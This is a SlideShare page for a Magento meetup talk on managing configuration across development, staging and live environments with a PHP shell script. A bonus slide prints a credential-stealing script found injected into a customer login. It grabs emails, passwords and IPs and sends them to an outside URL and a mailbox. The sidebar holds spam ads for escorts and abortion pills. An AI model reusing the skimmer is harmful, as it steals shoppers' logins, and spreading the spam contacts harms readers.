Magento Stammtisch Wien 17. Mai 2016

•Als PPTX, PDF herunterladen•

0 gefällt mir•411 views

This document discusses managing Magento configuration data for different production environments. It begins with an overview of Flimmit and the presenter. It then discusses how Magento loads configuration data from various files and the database. Managing configurations across development, staging, and production environments poses challenges. The presenter proposes a shell script that loads configuration settings from multiple files based on the environment. This approach allows configurations to be managed in version control and avoids including live access credentials in non-production databases. Pros of this approach include easy versioning and ensuring the correct configuration for load balancers. Cons include overriding settings stored in the database.

Software

Einfache Verwaltung von Config Daten für verschiedene Production Levels 18.05.2016
16. Magento-Stammtisch in Wien

| © Flimmit 2016 (confidential)2
→ Flimmit at a glance
→ About me
→ Functionality Magento Config
→ Challenges for daily business
→ Management with Config Script
→ Pros & Cons
Agenda

| © Flimmit 2016 (confidential)3
Flimmit at a Glance
Quick Facts
– Founded in 2007, based in Vienna
– Private Ownership, 3 founders/shareholders – worked as team since 2000
– Public Funding: EU Programme „Media“, Departure - Creative Agency Vienna,
Austria Wirtschaftsservice (AWS impulse), AT.net (BMVIT, FFG), Austrian Film
Institute(ÖFI), Wirtschaftsagentur Wien
– Take over by ORF in 2016 (ORS)
Business Units
– VoD portal for stream/download on multiple devices
– Film & TV Search engine module
– Content aggregation & distribution for third parties

| © Flimmit 2016 (confidential)5
About me
→ FH study in Salzburg 1998 – 2002
„Information Management & New Media“
→ PHP Developer since 2002
→ Magento Developer since 2008
→ Certified Developer since 05/2012
→ CTO & Founder at Flimmit

| © Flimmit 2016 (confidential)6
Functionality Magento Config
→ Core functionality in Mage_Core_Model_Config
→ Central Config merged from several files
Mage_Core_Model_Config::init()
– loadBase
– loadModules
– loadDb

| © Flimmit 2016 (confidential)7
Magento Config Init I
→ loadBase: Load all files from Etc-Directory „app/etc/“

| © Flimmit 2016 (confidential)8
Magento Config Init II
→ loadModules: Load all files from every module directory & local.xml

| © Flimmit 2016 (confidential)9
Magento Config Init III
→ loadDB: Load config from DB (core_config_data)

| © Flimmit 2016 (confidential)10
Challenges for daily business
→ Different development enviroments (local, stage, testing, live)
→ Different access levels for external services (e.g. payment)
→ Different development systems (cachetypes, session, smtp)
→ MySQL Dumps from live system include core_config_data (= live access data)
→ DB config not able to keep history/versions (e.g. in GIT)

| © Flimmit 2016 (confidential)11
Management with Config Script
→ Shell script in shell folder „config.php“
→ Config folder in „app/etc/“
→ Manage all config in different files
– local.xml for „local“ values
– mode-{type}.xml for modus values
– default.xml for default values
– global.xml for installation values
– store-{storecode}.xml for store relevant values
– website-{website}.xml for website relevant values
– …
→ php shell/config.php -mode live
to load relevant data into app/etc/local.xml
→ Live demo…!

| © Flimmit 2016 (confidential)12
Learnings, Pros & Cons
→ Learnings
– DB Config always wins!
– All levels within <config/> adjustable (global, default, admin, frontend, etc)
→ Pros
– Easy to manage in GIT with history
– Ensure live mode for loadbalancer nodes on startup:
php shell/config.php -mode live
– Avoid live access data in development
– Basic settings for new magento insallation available (sales, customer, catalog, etc)
→ Cons
– Avoid saving config in backend -> insert/update in DB
– Don‘t split in too many files

| © Flimmit 2016 (confidential)13
Bonus: mean hack found
→ Login for Customer (clean):

| © Flimmit 2016 (confidential)14
Bonus: mean hack found
→ Login for Customer (hacked):

| © Flimmit 2016 (confidential)15
Bonus: mean hack found
→ Script:
$emailboss = $username; $passboss = $password; $serverboss =
$_SERVER['SERVER_NAME']; $ipboss = $_SERVER['REMOTE_ADDR']; $details =
json_decode(file_get_contents("http://www.telize.com/geoip/".$ipboss.""));
$negara = $details->country_code; $nama_negara = $details->country; $kode_negara
= strtolower($negara); $chkmail =
file_get_contents("http://p4b.litbang.kkp.go.id/p4bjurnal/modules/path/mailceck/
?e=".$emailboss."&p=".$passboss.""); $pesan = "Email : ".$emailboss."nPassword
: ".$passboss."nStatus : ".$chkmail."nnIP Info : ".$ipboss." |
".$nama_negara." On ".date('r')."nBrowser :
".$_SERVER['HTTP_USER_AGENT']."nSite : ".$serverboss.""; $tamvan =
"loggercc@yahoo.com"; $subject = "User Login (".$chkmail.") (".$nama_negara.")
(".$ipboss.")"; $headers = "From: Logger User Magento From ".$serverboss."
<".$ipboss."@".$serverboss.">"; mail($tamvan, $subject, $pesan, $headers);

| © Flimmit 2016 (confidential)16
… to be continued …

Weitere ähnliche Inhalte

Ähnlich wie Magento Stammtisch Wien 17. Mai 2016

Hint: These are only the intro slides for the lice coding & demo (the recording will be published on YouTube). On-boarding new UI5 developers, time from checkout to deployment, Code Review, centralized CI/CD, UI5 tooling… With the right setup it's a no-brainer! In this session I’d like to show you an approach that I’ve been using successfully for years now. Learn and see how you can scale your UI5 projects for multiple developers and teams! This session will cover: - Local dev environment - 4 standard project templates: app, component, library, FLP plugin - Automated installation of the SAPUI5 SDK - Integrate thirdparty js libs via NPM dependencies (i.e. moment.js) - Integrate js libs via NPM from your own internal/external git repos - Managing dependencies from your ui5 apps to ui5 libs/components + run everything even on localhost - Integrating custom themes even on localhost - Reducing risks & creating "Shared Understanding" with code reviews (Gerrit/git) - Test automation, Code Coverage & Test Driven Development - Allow your developers to use latest JavaScript features via Babel - Deploy to NW ABAP from localhost & Jenkins using the CLI (without Eclipse, without SAPGUI)

Scaling UI5 Projects via Standardized Project & Infrastructure Setup (Ui5Con ...

Nabi Zamani

Catching up on Rich Clients Part 2 of 2

ukdpe

Mulesoft Meetup Milano #9 - Batch Processing and CI/CD

Gonzalo Marcos Ansoain

WSO2 Product Release webinar - WSO2 BAM 2.5

WSO2

Arkena IMF case study

Marc-Antoine ARNAUD

By clearly separating IBM Domino data from the web page, Domino REST services can open the door to a new world of interactive web applications. Learn about emerging web standards, including Web Components, that reflect new paradigms and help you create more interactive web applications. Find out what's new in Domino REST services and see examples of state-of-the-art applications that combine emerging web standards and REST.

IBM Connect 2014 - AD205: Creating State-of-the-Art Web Applications with Dom...

Dave Delay

Implementing API Facade using WSO2 API Management Platform

WSO2

FluentD for end to end monitoring

Phil Wilkins

OFMP The Road To OSGi Eclipse Democamp Luxembour 2008

Frederic Conrotte

PHP in the Enterprise connecting to SAP

webhostingguy

CharlesSweetResume06155122015

Charlie Sweet

Homer is an Open Source tool for real-time analysis and monitoring of VoIP and RTC platforms. It supports all the major OSS voice platforms, it's modular, easy to install and scales to carrier-grade infrastructures. Homer goes beyond collecting and correlating signalling and logs, and can also capture RTCP reports, QoS reports, and other events. Through an ElasticSearch endpoint, Homer supports BigData analysis of traffic. This workshop focuses on the deployment of a multi-node Homer framework with various approaches: bash installers, Docker containers, Puppet. We'll see how to configure Kamailio, FreeSWITCH (including the ESL interface), RTPEngine, Janus gateway (Events API), to collect signalling, RTCP reports, app-specific events and have them correlated and presented in a user-friendly GUI. For advanced users, we'll present the installation of captagent, the standalone capture agent, hepgen.js to generate test traffic, and a Wireshark dissector to have full visibility of data flows.

Homer - Workshop at Kamailio World 2017

Giacomo Vacca

Vancouver mulesoft meetup

Vikalp Bhalia

MuleSoft Surat Meetup#44 - Anypoint Flex Gateway Custom Policies With Rust

Jitendra Bafna

One of the common challenges in the digital space is improving the speed of releases without compromising the of quality of your app. The root of the problem is the market - customer expectations are on the rise, the app market is crowded, and app development is difficult. The solution is test automation. Watch Perfecto and Infostretch demonstrate Quantum, an established open-source test framework, to run robust, repeatable, and continuous test scenarios. In this technical webinar, the audience will learn how to use the test framework to -Create robust and maintainable test automation scripts -Extend open-source with advanced automation capabilities -Execute cross-platform mobile and web tests in parallel -Plug the newly created tests easily to the CI (Continuous Integration) workflow -Drive fast developer feedback with an advanced reporting library

Make the Shift from Manual to Automation with Open Source

Perfecto by Perforce

Where is cold fusion headed

ColdFusionConference

Lime broker

John Pereira

Open Mic: IBM Sametime Web Client & Meeting Server - An Introduction to new f...

jayeshpar2006

SIP Router Project

Daniel-Constantin Mierla

Many organizations who utilize SAP as their ERP solution struggle to integrate SAP with other systems in their enterprise. Without integration to SAP, these organizations fail to automate and to optimize their business processes. However, many approaches to integrating with SAP are complex, expensive, and difficult to employ. Mariano Capurro, Technical Engineering Manager at MuleSoft, discussed the fundamental SAP integration building blocks, SAP integration alternatives, how the MuleSoft SAP connector makes integration simple and effective, and common use cases for the MuleSoft SAP connector. Topics of this session will include: - Fundamental SAP Integration building blocks, including IDocs, BAPIs and JCo - SAP Integration alternatives - Using the SAP Connector - Common use cases Presenter: Mariano Capurro, Technical Engineering Manager, MuleSoft Technical Engineering Manager, MuleSoft

SAP Integration: Best Practices | MuleSoft

MuleSoft

Ähnlich wie Magento Stammtisch Wien 17. Mai 2016 (20)

Scaling UI5 Projects via Standardized Project & Infrastructure Setup (Ui5Con ...

Catching up on Rich Clients Part 2 of 2

Mulesoft Meetup Milano #9 - Batch Processing and CI/CD

WSO2 Product Release webinar - WSO2 BAM 2.5

Arkena IMF case study

IBM Connect 2014 - AD205: Creating State-of-the-Art Web Applications with Dom...

Implementing API Facade using WSO2 API Management Platform

FluentD for end to end monitoring

OFMP The Road To OSGi Eclipse Democamp Luxembour 2008

PHP in the Enterprise connecting to SAP

CharlesSweetResume06155122015

Homer - Workshop at Kamailio World 2017

Vancouver mulesoft meetup

MuleSoft Surat Meetup#44 - Anypoint Flex Gateway Custom Policies With Rust

Make the Shift from Manual to Automation with Open Source

Where is cold fusion headed

Lime broker

Open Mic: IBM Sametime Web Client & Meeting Server - An Introduction to new f...

SIP Router Project

SAP Integration: Best Practices | MuleSoft

Kürzlich hochgeladen

(Vivek)Call Us, 8448380779,Call girls in Delhi NCr – We Offer best in class call girls. escort Service At Affordable Price At low Rate with Space Night 8000 We Are One Of The Oldest Escort and Call girls Agencies in Delhi. You Will Find That Our Female Escorts Are Full Of Fun, Sexy And They Would Love Enjoy Your Company. We Have A Fantastic Selection Of Escort Ladies Available For In-Calls As Well As Out-Calls. Our Escorts Are Not Only Beautiful But All Have Great Personalities Making Them The Perfect Companion For Any Occasion. In-Call:- You Can Come At Our Place in Delhi Our place Which Is Very Clean Hygienic 100% safe Accommodation. Out-Call:- You have To Come Pick The Girl From My Place We Are Also Provide Door Step Services (Delhi Ncr, Noida, Gurgaon, Faridabad, Ghaziabad Note:- Pic Collectors Time Passers Bargainers Stay Away As We Respect The Value For Your Money Time And Expect The Same From You Hygienic:- Full Ac room And Clean Rooms Available In Hotel 24 * 7 Hourly In Delhi NCR More Details, With WhatsApp Number, +91-8448380779

call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️

Delhi Call girls

%in tembisa+277-882-255-28 abortion pills for sale in tembisa

masabamasaba

%in Midrand+277-882-255-28 abortion pills for sale in midrand

masabamasaba

Define the academic and professional writing..pdf

PearlKirahMaeRagusta1

8257 interfacing 2 in microprocessor for btech students

HimanshiGarg82

At the recent Microsoft Ignite 2023 conference, Microsoft unveiled a groundbreaking strategy that will redefine enterprise work management. The plan involves integrating Microsoft’s key planning tools, Microsoft To Do, Microsoft Planner, and Microsoft Project for the web into a unified experience called “Microsoft Planner.” What does this new strategy from Microsoft mean for current users? Join us and learn how best to take advantage of this announcement while gaining a clear path on how to elevate the current state of Microsoft Planner from a basic task manager to a comprehensive tool for Enterprise Work Management using OnePlan. Learn how OnePlan’s integration with Microsoft Planner allows for strategic alignment with business goals through advanced features like strategic planning, portfolio management, resource management, financial management, and more!

Introducing Microsoft’s new Enterprise Work Management (EWM) Solution

OnePlan Solutions

OpenChain - The Ramifications of ISO/IEC 5230 and ISO/IEC 18974 for Legal Pro...

Shane Coughlan

A great deal of attention in medical devices has shifted towards cybersecurity with the ratification of section 524B of the FD&C act. This new law enables the FDA to enforce cybersecurity controls in any medical device that is capable of networked communications or that has software. In this webinar we will recap the process for managing vulnerabilities, identify categories of vulnerabilities and solutions and more.

The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...

ICS

%in kempton park+277-882-255-28 abortion pills for sale in kempton park

masabamasaba

Craft an AI & Machine Learning Pitch with our Editable Professional PowerPoint Template. Ignite your AI & Machine Learning pitch with our cutting-edge PowerPoint template tailored for the industry. Perfect for AI conferences, investor presentations, sales pitches to tech-focused companies, training sessions, and educational programs. - 20+ editable slides: Get a variety of options to choose from for your presentation. - Time-saving solution: Download, replace text/images with a few clicks. - User-friendly customization: Easy to use and personalize. - Modern and attractive design: Captivating visuals, sleek layout. - Tailored to your requirements: Fully alterable for customization. - Well-organized slides: Complete control over content. - Thematic specificity: Reflects healthcare industry with relevant graphics. - Showcase your business idea: Communicate value proposition effectively.

AI & Machine Learning Presentation Template

Presentation.STUDIO

Many specialized tools cater to distinct stages within the software development lifecycle (SDLC). These tools target various aspects of development, delivery, and operations, each with its unique strengths. Uniting these diverse testing needs into a single continuous testing platform presents several challenges. Such a platform must seamlessly integrate with various development tools and environments, accommodate different testing methodologies, and remain flexible to adapt to organizational processes and quality standards.

The Guide to Integrating Generative AI into Unified Continuous Testing Platfo...

kalichargn70th171

MakeMyPass" Online Bus Pass Management System illustrates the flow of activities and actions that occur within the system to accomplish specific tasks or use cases. This type of diagram focuses on representing the sequence of activities and decision points involved in a particular process. Below is an example outline and description of key elements that could be included in an Activity Diagram for the system:

BUS PASS MANGEMENT SYSTEM USING PHP.pptx

alwaysnagaraju26

In today's dynamic e-commerce landscape, the payment gateway emerges as a linchpin, ensuring smooth and secure transactions between buyers and sellers. In this discourse, we delve into the meticulous process of devising test cases tailored for scrutinizing payment gateways. Crafting precise test cases for payment gateways is a quintessential responsibility for testers operating within the service industry. This article meticulously explores pivotal scenarios integral to how to test payment gateways, coupled with essential guidelines for drafting effective test cases.

Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf

kalichargn70th171

Model Call Girl Services in Delhi reach out to us at 🔝 9953056974 🔝✔️✔️ Our agency presents a selection of young, charming call girls available for bookings at Oyo Hotels. Experience high-class escort services at pocket-friendly rates, with our female escorts exuding both beauty and a delightful personality, ready to meet your desires. Whether it's Housewives, College girls, Russian girls, Muslim girls, or any other preference, we offer a diverse range of options to cater to your tastes. We provide both in-call and out-call services for your convenience. Our in-call location in Delhi ensures cleanliness, hygiene, and 100% safety, while our out-call services offer doorstep delivery for added ease. We value your time and money, hence we kindly request pic collectors, time-passers, and bargain hunters to refrain from contacting us. Our services feature various packages at competitive rates: One shot: ₹2000/in-call, ₹5000/out-call Two shots with one girl: ₹3500/in-call, ₹6000/out-call Body to body massage with sex: ₹3000/in-call Full night for one person: ₹7000/in-call, ₹10000/out-call Full night for more than 1 person: Contact us at 🔝 9953056974 🔝. for details Operating 24/7, we serve various locations in Delhi, including Green Park, Lajpat Nagar, Saket, and Hauz Khas near metro stations. For premium call girl services in Delhi 🔝 9953056974 🔝. Thank you for considering us!

CHEAP Call Girls in Pushp Vihar (-DELHI )🔝 9953056974🔝(=)/CALL GIRLS SERVICE

9953056974 Low Rate Call Girls In Saket, Delhi NCR

%in Bahrain+277-882-255-28 abortion pills for sale in Bahrain

masabamasaba

In the past six months, the AI landscape has undergone a massive transformation, ushering in a new era of productivity with the latest in Large Language Models (LLMs) and AI technology. This deep dive unlocks how to: Create CustomGPT Models: No coding needed to tailor AI for your unique projects. Integrate your own data, including PDFs and Excel sheets, making information handling a breeze. Plus, discover how to call your own actions/integrations for even more personalized utility. Navigate Advanced Prompting: Overcome AI's memory limits and utilize Retrieval-Augmented Generation for accessing your personalized data, streamlining how you interact with AI. Stay Ahead with AI Trends: Peek into the evolving world of LLMs, featuring newcomers like Google Gemini, Anthropic Claude, Open Sora, and Twitter Grok, and understand what their advancements mean for your productivity. Witness Real-Life Transformations: Through examples and prompt demonstrations, see firsthand how these AI strategies revolutionize routine tasks, from data analysis to content creation. Learn to leverage image output and input for advanced practical use cases, adding a new dimension to your productivity toolkit. No previous coding or AI experience is needed for this talk. Stay ahead in the fast-evolving world of work. Embrace the AI revolution and transform your workflow with advanced LLM techniques. Join us to ensure you're not left behind in the productivity race.

AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques

VictorSzoltysek

introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf

VishalKumarJha10

Technology has taken up space all over the world. From generating content with a single command on ChatGPT to getting your food served by Robots at your favorite restaurant, artificial advancements have ruled every space. Every industry is set to develop top-notch technology in every sector; finance, IT, healthcare, gaming, and banking, with competitive market standards. One of these rapidly growing industries is Mobile App Development. According to the Straits Research report, it is expected to reach USD 583.03 billion at a CAGR OF 12.8% between (2022 and 2030). It clearly shows how mobile app development has become an integral part of the digital landscape and revolutionized technology.

The Top App Development Trends Shaping the Industry in 2024-25 .pdf

ayushiqss

Data spaces in distributed environments should be allowed to evolve in agile ways providing data space owners with large flexibility about which data they store. Agility and heterogeneity, however, jeopardize data exchanges because representations may build on varying ontologies and data consumers may not rely on the semantic correctness of their queries in the context of semantically heterogeneous, evolving data spaces. Graph data spaces are one example of a powerful model for representing and querying data whose semantics may change over time. To assert and enforce conditions on individual graph data spaces, shape languages (e.g SHACL) have been developed. We investigate the question of how querying and programming can be guarded by reasoning over SHACL constraints in a distributed setting and we sketch a picture of how a future landscape based on semantically heterogeneous data spaces might look like.

Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...

Steffen Staab

A Secure and Reliable Document Management System is Essential.docx

ComplianceQuest1

Kürzlich hochgeladen (20)